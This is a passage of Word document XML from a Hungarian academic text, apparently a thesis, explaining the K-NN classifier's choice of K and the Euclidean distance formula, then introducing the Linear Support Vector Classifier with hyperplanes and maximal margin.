        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00112277">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00316811">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00261F06">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00C51F55" w:rsidRPr="00C51F55">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a K-</w:t>
      </w:r>
      <w:r w:rsidR="00C51F55">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>NN algoritmus pontossága a K érték függvényében</w:t>
      </w:r>
      <w:r w:rsidR="007D3867">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="001458F0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="007D3867">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115D2B1" w14:textId="77777777" w:rsidR="0008410D" w:rsidRDefault="0008410D" w:rsidP="00736364">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EE9C91" w14:textId="4C6FEF10" w:rsidR="003C10B4" w:rsidRDefault="003C10B4" w:rsidP="00863EB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A K szám meghatározásakor tehát két dolgot fontos figyelembe venni: ha az értéke túl kicsi, az bár pontosítja az algoritmust</w:t>
      </w:r>
      <w:r w:rsidR="000D62EF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, de </w:t>
      </w:r>
      <w:r w:rsidR="00770CD2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a kiugró értékei miatt</w:t>
      </w:r>
      <w:r w:rsidR="002B7615">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zajossá teheti azt. Ellenben. ha túl nagy, az az algoritmus pontatlanságát éri el.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530037EB" w14:textId="3ACCD2BD" w:rsidR="0071698C" w:rsidRDefault="00367762" w:rsidP="00863EB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Bár </w:t>
      </w:r>
      <w:r w:rsidR="00554765">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">emellett is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a legegyszerűbb osztályozások </w:t>
      </w:r>
      <w:r w:rsidR="004223DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egyike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, de c</w:t>
      </w:r>
      <w:r w:rsidR="0071698C" w:rsidRPr="0071698C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sakúgy, mint szinte minde</w:t>
      </w:r>
      <w:r w:rsidR="00497210">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>gyik</w:t>
      </w:r>
      <w:r w:rsidR="0071698C" w:rsidRPr="0071698C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> más, a K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0071698C" w:rsidRPr="0071698C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>NN is az általa alkalmazott mélyen gyökerező matematikai elméletek miatt működik.</w:t>
      </w:r>
      <w:r w:rsidR="00415F8A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071698C" w:rsidRPr="0071698C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A K</w:t>
      </w:r>
      <w:r w:rsidR="00DB59A0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0071698C" w:rsidRPr="0071698C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>NN megvalósításakor az adatpontok jellemző vektorokká vagy matematikai értékekké alakítása</w:t>
      </w:r>
      <w:r w:rsidR="00393BD5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> után</w:t>
      </w:r>
      <w:r w:rsidR="00460C52">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00460C52" w:rsidRPr="00460C52">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az algoritmus megtalálja a pontok közötti távolságot</w:t>
      </w:r>
      <w:r w:rsidR="007911A9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E022DE" w:rsidRPr="00E022DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
      </w:r>
      <w:r w:rsidR="00943AED">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="00E022DE" w:rsidRPr="00E022DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>szi távolság</w:t>
      </w:r>
      <w:r w:rsidR="009D05FF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiszámítása.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E749A19" w14:textId="2A486143" w:rsidR="001B01CC" w:rsidRDefault="001B01CC" w:rsidP="006004C2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C81950" w14:textId="00A6F37A" w:rsidR="001B01CC" w:rsidRDefault="008F07D9" w:rsidP="00863EB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>d</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>p,q</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>=</m:t>
          </m:r>
          <m:rad>
            <m:radPr>
              <m:degHide m:val="1"/>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:radPr>
            <m:deg/>
            <m:e>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1</m:t>
                      </m:r>
                    </m:sub>
                  </m:sSub>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>)</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>2</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>+</m:t>
              </m:r>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2</m:t>
                      </m:r>
                    </m:sub>
                  </m:sSub>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>)</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>2</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>+…+</m:t>
              </m:r>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n</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n</m:t>
                      </m:r>
                    </m:sub>
                  </m:sSub>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>)</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>2</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
            </m:e>
          </m:rad>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="3CE62179" w14:textId="3673B6FC" w:rsidR="001B01CC" w:rsidRDefault="008F07D9" w:rsidP="008F07D9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="000A4B96">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D5A6E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-as ábra: </w:t>
      </w:r>
      <w:r w:rsidR="009121FF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az </w:t>
      </w:r>
      <w:r w:rsidR="0002230A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AA189" w14:textId="55C057CB" w:rsidR="0071698C" w:rsidRDefault="0071698C" w:rsidP="00422B08">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF4D7E5" w14:textId="77777777" w:rsidR="00207AD0" w:rsidRDefault="00207AD0" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043B66B5" w14:textId="3DC57269" w:rsidR="00D33DD0" w:rsidRPr="00921E07" w:rsidRDefault="00C80AC1"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7" w:name="_Toc71471973"/>
      <w:r w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Lin</w:t>
      </w:r>
      <w:r w:rsidR="00841A6B" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ear </w:t>
      </w:r>
      <w:r w:rsidR="00D33DD0" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Support Vector</w:t>
      </w:r>
      <w:r w:rsidR="00D9641E" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB5138" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D933BF" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>LinearSVC</w:t>
      </w:r>
      <w:r w:rsidR="00CB5138" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2AACEB3A" w14:textId="46C8E50A" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F1B2C0" w14:textId="0D191222" w:rsidR="00333871" w:rsidRDefault="00623D8E" w:rsidP="00DB7B65">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00623D8E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CB5138">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z S</w:t>
      </w:r>
      <w:r w:rsidR="00F004CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">upport </w:t>
      </w:r>
      <w:r w:rsidR="00CB5138">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00F004CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ector </w:t>
      </w:r>
      <w:r w:rsidR="00CB5138">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00F004CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>achine</w:t>
      </w:r>
      <w:r w:rsidR="00CB5138">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB27E0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(SVM) </w:t>
      </w:r>
      <w:r w:rsidR="001C7C90">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00623D8E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>döntési határokat meghatározó döntési síkok koncepcióján alapul.</w:t>
      </w:r>
      <w:r w:rsidR="00526171">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A22F9" w:rsidRPr="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="003743CC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Linear</w:t>
      </w:r>
      <w:r w:rsidR="00FC245F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SV</w:t>
      </w:r>
      <w:r w:rsidR="00093405">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002A22F9" w:rsidRPr="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> gépi algoritmus célja egy </w:t>
      </w:r>
      <w:r w:rsidR="004B556E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">lineáris </w:t>
      </w:r>
      <w:r w:rsidR="002A22F9" w:rsidRPr="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hipersík </w:t>
      </w:r>
      <w:r w:rsidR="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(hyperplane) </w:t>
      </w:r>
      <w:r w:rsidR="002A22F9" w:rsidRPr="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>megtalálása</w:t>
      </w:r>
      <w:r w:rsidR="00AC7257">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002A22F9" w:rsidRPr="002A22F9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">amely egyértelműen </w:t>
      </w:r>
      <w:r w:rsidR="00526171" w:rsidRPr="00F233DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>elválasztja a különböző osztály</w:t>
      </w:r>
      <w:r w:rsidR="00526171">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ok tagjainak</w:t>
      </w:r>
      <w:r w:rsidR="00526171" w:rsidRPr="00F233DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> halmazát</w:t>
      </w:r>
      <w:r w:rsidR="00526171">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB7B65">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ehhez </w:t>
      </w:r>
      <w:r w:rsidR="00C7115E" w:rsidRPr="00C7115E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">sokféle hipersík választható. </w:t>
      </w:r>
      <w:r w:rsidR="004A5764">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A cél </w:t>
      </w:r>
      <w:r w:rsidR="00C7115E" w:rsidRPr="00C7115E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy olyan sík megtalálása</w:t>
      </w:r>
      <w:r w:rsidR="00095375">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – amelyet a </w:t>
      </w:r>
      <w:r w:rsidR="000F2273">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.2.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00095375">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004729B3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">es </w:t>
      </w:r>
      <w:r w:rsidR="00095375">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ábra szemléltet </w:t>
      </w:r>
      <w:r w:rsidR="00603E90">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C7115E" w:rsidRPr="00C7115E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amely rendelkezik a maximális margóval, vagyis a maximális távolsággal mindkét osztály adatpontja között.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3B4A9" w14:textId="5FDB3953" w:rsidR="00CC6C6D" w:rsidRPr="00CC6C6D" w:rsidRDefault="006D1974" w:rsidP="00F520AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Az optimális sík megtalálása </w:t>
      </w:r>
      <w:r w:rsidR="00F1003C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>esetén</w:t>
      </w:r>
      <w:r w:rsidR="00726100">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00264CC6">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0</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00264CC6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00532491">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7C37">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy új pont (</w:t>
      </w:r>
      <m:oMath>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oMath>
      <w:r w:rsidR="000B7C37">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F1003C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztályozás</w:t>
      </w:r>
      <w:r w:rsidR="000B7C37">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F1003C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7C37">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</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oMath>
      <w:r w:rsidR="000B7C37">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00F1003C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>már roppant egyszerű</w:t>
      </w:r>
      <w:r w:rsidR="00CD3B91">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidR="006A4A4C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z algoritmus </w:t>
      </w:r>
      <w:r w:rsidR="00C27010">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00F520AE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lineáris regresszió</w:t>
      </w:r>
      <w:r w:rsidR="00546F23">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kimenetét </w:t>
      </w:r>
      <w:r w:rsidR="00CD3B91">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">vizsgálja. </w:t>
      </w:r>
      <w:r w:rsidR="009E1FE8" w:rsidRPr="009E1FE8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Mivel az SVM a küszöbértékeket 1-re </w:t>
      </w:r>
      <w:r w:rsidR="00BB022E">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1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="005B2680">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="009E1FE8" w:rsidRPr="009E1FE8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és -1-re </w:t>
      </w:r>
      <w:r w:rsidR="005B2680">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1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="005B2680">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00A96881">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>állít</w:t>
      </w:r>
      <w:r w:rsidR="009B51B1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="00A96881">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009E1FE8" w:rsidRPr="009E1FE8">
        <w:rPr>
